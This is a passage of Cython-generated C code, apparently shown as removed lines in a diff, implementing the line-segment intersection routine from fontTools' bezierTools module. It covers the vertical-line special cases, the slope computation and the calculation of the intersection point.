*__pyx_callargs[3] = {__pyx_t_2, __pyx_v_e1x, __pyx_v_s1x}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1186, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - __pyx_t_5 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_5 < 0))) __PYX_ERR(0, 1186, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - if (__pyx_t_5) { - - /* "fontTools/misc/bezierTools.py":1187 - * return [] - * if math.isclose(e1x, s1x): - * x = s1x # <<<<<<<<<<<<<< - * slope34 = (e2y - s2y) / (e2x - s2x) - * y = slope34 * (x - s2x) + s2y - */ - __Pyx_INCREF(__pyx_v_s1x); - __pyx_v_x = __pyx_v_s1x; - - /* "fontTools/misc/bezierTools.py":1188 - * if math.isclose(e1x, s1x): - * x = s1x - * slope34 = (e2y - s2y) / (e2x - s2x) # <<<<<<<<<<<<<< - * y = slope34 * (x - s2x) + s2y - * pt = (x, y) - */ - __pyx_t_1 = PyNumber_Subtract(__pyx_v_e2y, __pyx_v_s2y); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1188, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_3 = PyNumber_Subtract(__pyx_v_e2x, __pyx_v_s2x); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1188, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = __Pyx_PyNumber_Divide(__pyx_t_1, __pyx_t_3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1188, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_v_slope34 = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1189 - * x = s1x - * slope34 = (e2y - s2y) / (e2x - s2x) - * y = slope34 * (x - s2x) + s2y # <<<<<<<<<<<<<< - * pt = (x, y) - * return [ - */ - __pyx_t_2 = PyNumber_Subtract(__pyx_v_x, __pyx_v_s2x); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1189, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyNumber_Multiply(__pyx_v_slope34, __pyx_t_2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1189, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Add(__pyx_t_3, __pyx_v_s2y); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1189, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_v_y = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1190 - * slope34 = (e2y - s2y) / (e2x - s2x) - * y = slope34 * (x - s2x) + s2y - * pt = (x, y) # <<<<<<<<<<<<<< - * return [ - * Intersection( - */ - __pyx_t_2 = PyTuple_New(2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1190, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_INCREF(__pyx_v_x); - __Pyx_GIVEREF(__pyx_v_x); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_v_x)) __PYX_ERR(0, 1190, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_y); - __Pyx_GIVEREF(__pyx_v_y); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 1, __pyx_v_y)) __PYX_ERR(0, 1190, __pyx_L1_error); - __pyx_v_pt = ((PyObject*)__pyx_t_2); - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1191 - * y = slope34 * (x - s2x) + s2y - * pt = (x, y) - * return [ # <<<<<<<<<<<<<< - * Intersection( - * pt=pt, t1=_line_t_of_pt(s1, e1, pt), t2=_line_t_of_pt(s2, e2, pt) - */ - __Pyx_XDECREF(__pyx_r); - - /* "fontTools/misc/bezierTools.py":1192 - * pt = (x, y) - * return [ - * Intersection( # <<<<<<<<<<<<<< - * pt=pt, t1=_line_t_of_pt(s1, e1, pt), t2=_line_t_of_pt(s2, e2, pt) - * ) - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_Intersection); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1192, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - - /* "fontTools/misc/bezierTools.py":1193 - * return [ - * Intersection( - * pt=pt, t1=_line_t_of_pt(s1, e1, pt), t2=_line_t_of_pt(s2, e2, pt) # <<<<<<<<<<<<<< - * ) - * ] - */ - __pyx_t_3 = __Pyx_PyDict_NewPresized(3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1193, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_t_3, __pyx_n_s_pt, __pyx_v_pt) < 0) __PYX_ERR(0, 1193, __pyx_L1_error) - __Pyx_GetModuleGlobalName(__pyx_t_9, __pyx_n_s_line_t_of_pt); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 1193, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __pyx_t_10 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_9))) { - __pyx_t_10 = PyMethod_GET_SELF(__pyx_t_9); - if (likely(__pyx_t_10)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_9); - __Pyx_INCREF(__pyx_t_10); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_9, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_10, __pyx_v_s1, __pyx_v_e1, __pyx_v_pt}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_9, __pyx_callargs+1-__pyx_t_6, 3+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_10); __pyx_t_10 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1193, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - } - if (PyDict_SetItem(__pyx_t_3, __pyx_n_s_t1, __pyx_t_1) < 0) __PYX_ERR(0, 1193, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_GetModuleGlobalName(__pyx_t_9, __pyx_n_s_line_t_of_pt); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 1193, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __pyx_t_10 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_9))) { - __pyx_t_10 = PyMethod_GET_SELF(__pyx_t_9); - if (likely(__pyx_t_10)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_9); - __Pyx_INCREF(__pyx_t_10); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_9, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_10, __pyx_v_s2, __pyx_v_e2, __pyx_v_pt}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_9, __pyx_callargs+1-__pyx_t_6, 3+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_10); __pyx_t_10 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1193, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - } - if (PyDict_SetItem(__pyx_t_3, __pyx_n_s_t2, __pyx_t_1) < 0) __PYX_ERR(0, 1193, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1192 - * pt = (x, y) - * return [ - * Intersection( # <<<<<<<<<<<<<< - * pt=pt, t1=_line_t_of_pt(s1, e1, pt), t2=_line_t_of_pt(s2, e2, pt) - * ) - */ - __pyx_t_1 = __Pyx_PyObject_Call(__pyx_t_2, __pyx_empty_tuple, __pyx_t_3); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1192, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1191 - * y = slope34 * (x - s2x) + s2y - * pt = (x, y) - * return [ # <<<<<<<<<<<<<< - * Intersection( - * pt=pt, t1=_line_t_of_pt(s1, e1, pt), t2=_line_t_of_pt(s2, e2, pt) - */ - __pyx_t_3 = PyList_New(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1191, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyList_SET_ITEM(__pyx_t_3, 0, __pyx_t_1)) __PYX_ERR(0, 1191, __pyx_L1_error); - __pyx_t_1 = 0; - __pyx_r = __pyx_t_3; - __pyx_t_3 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1186 - * if math.isclose(s1x, e1x) and math.isclose(s1y, e1y): # Line segment is tiny - * return [] - * if math.isclose(e1x, s1x): # <<<<<<<<<<<<<< - * x = s1x - * slope34 = (e2y - s2y) / (e2x - s2x) - */ - } - - /* "fontTools/misc/bezierTools.py":1196 - * ) - * ] - * if math.isclose(s2x, e2x): # <<<<<<<<<<<<<< - * x = s2x - * slope12 = (e1y - s1y) / (e1x - s1x) - */ - __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_math); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1196, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_isclose); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1196, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_1)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_1, __pyx_v_s2x, __pyx_v_e2x}; - __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; - if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1196, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - __pyx_t_5 = __Pyx_PyObject_IsTrue(__pyx_t_3); if (unlikely((__pyx_t_5 < 0))) __PYX_ERR(0, 1196, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - if (__pyx_t_5) { - - /* "fontTools/misc/bezierTools.py":1197 - * ] - * if math.isclose(s2x, e2x): - * x = s2x # <<<<<<<<<<<<<< - * slope12 = (e1y - s1y) / (e1x - s1x) - * y = slope12 * (x - s1x) + s1y - */ - __Pyx_INCREF(__pyx_v_s2x); - __pyx_v_x = __pyx_v_s2x; - - /* "fontTools/misc/bezierTools.py":1198 - * if math.isclose(s2x, e2x): - * x = s2x - * slope12 = (e1y - s1y) / (e1x - s1x) # <<<<<<<<<<<<<< - * y = slope12 * (x - s1x) + s1y - * pt = (x, y) - */ - __pyx_t_3 = PyNumber_Subtract(__pyx_v_e1y, __pyx_v_s1y); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1198, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = PyNumber_Subtract(__pyx_v_e1x, __pyx_v_s1x); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1198, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = __Pyx_PyNumber_Divide(__pyx_t_3, __pyx_t_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1198, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_slope12 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1199 - * x = s2x - * slope12 = (e1y - s1y) / (e1x - s1x) - * y = slope12 * (x - s1x) + s1y # <<<<<<<<<<<<<< - * pt = (x, y) - * return [ - */ - __pyx_t_1 = PyNumber_Subtract(__pyx_v_x, __pyx_v_s1x); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1199, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Multiply(__pyx_v_slope12, __pyx_t_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1199, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Add(__pyx_t_2, __pyx_v_s1y); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1199, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_v_y = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1200 - * slope12 = (e1y - s1y) / (e1x - s1x) - * y = slope12 * (x - s1x) + s1y - * pt = (x, y) # <<<<<<<<<<<<<< - * return [ - * Intersection( - */ - __pyx_t_1 = PyTuple_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1200, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_x); - __Pyx_GIVEREF(__pyx_v_x); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_x)) __PYX_ERR(0, 1200, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_y); - __Pyx_GIVEREF(__pyx_v_y); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_v_y)) __PYX_ERR(0, 1200, __pyx_L1_error); - __pyx_v_pt = ((PyObject*)__pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1201 - * y = slope12 * (x - s1x) + s1y - * pt = (x, y) - * return [ # <<<<<<<<<<<<<< - * Intersection( - * pt=pt, t1=_line_t_of_pt(s1, e1, pt), t2=_line_t_of_pt(s2, e2, pt) - */ - __Pyx_XDECREF(__pyx_r); - - /* "fontTools/misc/bezierTools.py":1202 - * pt = (x, y) - * return [ - * Intersection( # <<<<<<<<<<<<<< - * pt=pt, t1=_line_t_of_pt(s1, e1, pt), t2=_line_t_of_pt(s2, e2, pt) - * ) - */ - __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_Intersection); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1202, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - - /* "fontTools/misc/bezierTools.py":1203 - * return [ - * Intersection( - * pt=pt, t1=_line_t_of_pt(s1, e1, pt), t2=_line_t_of_pt(s2, e2, pt) # <<<<<<<<<<<<<< - * ) - * ] - */ - __pyx_t_2 = __Pyx_PyDict_NewPresized(3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1203, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_t_2, __pyx_n_s_pt, __pyx_v_pt) < 0) __PYX_ERR(0, 1203, __pyx_L1_error) - __Pyx_GetModuleGlobalName(__pyx_t_9, __pyx_n_s_line_t_of_pt); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 1203, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __pyx_t_10 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_9))) { - __pyx_t_10 = PyMethod_GET_SELF(__pyx_t_9); - if (likely(__pyx_t_10)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_9); - __Pyx_INCREF(__pyx_t_10); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_9, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_10, __pyx_v_s1, __pyx_v_e1, __pyx_v_pt}; - __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_9, __pyx_callargs+1-__pyx_t_6, 3+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_10); __pyx_t_10 = 0; - if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1203, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - } - if (PyDict_SetItem(__pyx_t_2, __pyx_n_s_t1, __pyx_t_3) < 0) __PYX_ERR(0, 1203, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_GetModuleGlobalName(__pyx_t_9, __pyx_n_s_line_t_of_pt); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 1203, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __pyx_t_10 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_9))) { - __pyx_t_10 = PyMethod_GET_SELF(__pyx_t_9); - if (likely(__pyx_t_10)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_9); - __Pyx_INCREF(__pyx_t_10); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_9, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_10, __pyx_v_s2, __pyx_v_e2, __pyx_v_pt}; - __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_9, __pyx_callargs+1-__pyx_t_6, 3+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_10); __pyx_t_10 = 0; - if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1203, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - } - if (PyDict_SetItem(__pyx_t_2, __pyx_n_s_t2, __pyx_t_3) < 0) __PYX_ERR(0, 1203, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1202 - * pt = (x, y) - * return [ - * Intersection( # <<<<<<<<<<<<<< - * pt=pt, t1=_line_t_of_pt(s1, e1, pt), t2=_line_t_of_pt(s2, e2, pt) - * ) - */ - __pyx_t_3 = __Pyx_PyObject_Call(__pyx_t_1, __pyx_empty_tuple, __pyx_t_2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1202, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1201 - * y = slope12 * (x - s1x) + s1y - * pt = (x, y) - * return [ # <<<<<<<<<<<<<< - * Intersection( - * pt=pt, t1=_line_t_of_pt(s1, e1, pt), t2=_line_t_of_pt(s2, e2, pt) - */ - __pyx_t_2 = PyList_New(1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1201, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 0, __pyx_t_3)) __PYX_ERR(0, 1201, __pyx_L1_error); - __pyx_t_3 = 0; - __pyx_r = __pyx_t_2; - __pyx_t_2 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1196 - * ) - * ] - * if math.isclose(s2x, e2x): # <<<<<<<<<<<<<< - * x = s2x - * slope12 = (e1y - s1y) / (e1x - s1x) - */ - } - - /* "fontTools/misc/bezierTools.py":1207 - * ] - * - * slope12 = (e1y - s1y) / (e1x - s1x) # <<<<<<<<<<<<<< - * slope34 = (e2y - s2y) / (e2x - s2x) - * if math.isclose(slope12, slope34): - */ - __pyx_t_2 = PyNumber_Subtract(__pyx_v_e1y, __pyx_v_s1y); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1207, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyNumber_Subtract(__pyx_v_e1x, __pyx_v_s1x); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1207, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_1 = __Pyx_PyNumber_Divide(__pyx_t_2, __pyx_t_3); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1207, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_v_slope12 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1208 - * - * slope12 = (e1y - s1y) / (e1x - s1x) - * slope34 = (e2y - s2y) / (e2x - s2x) # <<<<<<<<<<<<<< - * if math.isclose(slope12, slope34): - * return [] - */ - __pyx_t_1 = PyNumber_Subtract(__pyx_v_e2y, __pyx_v_s2y); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1208, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_3 = PyNumber_Subtract(__pyx_v_e2x, __pyx_v_s2x); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1208, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = __Pyx_PyNumber_Divide(__pyx_t_1, __pyx_t_3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1208, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_v_slope34 = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1209 - * slope12 = (e1y - s1y) / (e1x - s1x) - * slope34 = (e2y - s2y) / (e2x - s2x) - * if math.isclose(slope12, slope34): # <<<<<<<<<<<<<< - * return [] - * x = (slope12 * s1x - s1y - slope34 * s2x + s2y) / (slope12 - slope34) - */ - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_math); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1209, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_isclose); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1209, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_1))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_1); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_1, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_3, __pyx_v_slope12, __pyx_v_slope34}; - __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1209, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - } - __pyx_t_5 = __Pyx_PyObject_IsTrue(__pyx_t_2); if (unlikely((__pyx_t_5 < 0))) __PYX_ERR(0, 1209, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - if (__pyx_t_5) { - - /* "fontTools/misc/bezierTools.py":1210 - * slope34 = (e2y - s2y) / (e2x - s2x) - * if math.isclose(slope12, slope34): - * return [] # <<<<<<<<<<<<<< - * x = (slope12 * s1x - s1y - slope34 * s2x + s2y) / (slope12 - slope34) - * y = slope12 * (x - s1x) + s1y - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_2 = PyList_New(0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1210, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_r = __pyx_t_2; - __pyx_t_2 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1209 - * slope12 = (e1y - s1y) / (e1x - s1x) - * slope34 = (e2y - s2y) / (e2x - s2x) - * if math.isclose(slope12, slope34): # <<<<<<<<<<<<<< - * return [] - * x = (slope12 * s1x - s1y - slope34 * s2x + s2y) / (slope12 - slope34) - */ - } - - /* "fontTools/misc/bezierTools.py":1211 - * if math.isclose(slope12, slope34): - * return [] - * x = (slope12 * s1x - s1y - slope34 * s2x + s2y) / (slope12 - slope34) # <<<<<<<<<<<<<< - * y = slope12 * (x - s1x) + s1y - * pt = (x, y) - */ - __pyx_t_2 = PyNumber_Multiply(__pyx_v_slope12, __pyx_v_s1x); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1211, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PyNumber_Subtract(__pyx_t_2, __pyx_v_s1y); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1211, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Multiply(__pyx_v_slope34, __pyx_v_s2x); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1211, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyNumber_Subtract(__pyx_t_1, __pyx_t_2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1211, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Add(__pyx_t_3, __pyx_v_s2y); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1211, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = PyNumber_Subtract(__pyx_v_slope12, __pyx_v_slope34); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1211, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_1 = __Pyx_PyNumber_Divide(__pyx_t_2, __pyx_t_3); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1211, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_v_x = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1212 - * return [] - * x = (slope12 * s1x - s1y - slope34 * s2x + s2y) / (slope12 - slope34) - * y = slope12 * (x - s1x) + s1y # <<<<<<<<<<<<<< - * pt = (x, y) - * if _both_points_are_on_same_side_of_origin( - */ - __pyx_t_1 = PyNumber_Subtract(__pyx_v_x, __pyx_v_s1x); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1212, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_3 = PyNumber_Multiply(__pyx_v_slope12, __pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1212, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyNumber_Add(__pyx_t_3, __pyx_v_s1y); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1212, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_v_y = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1213 - * x = (slope12 * s1x - s1y - slope34 * s2x + s2y) / (slope12 - slope34) - * y = slope12 * (x - s1x) + s1y - * pt = (x, y) # <<<<<<<<<<<<<< 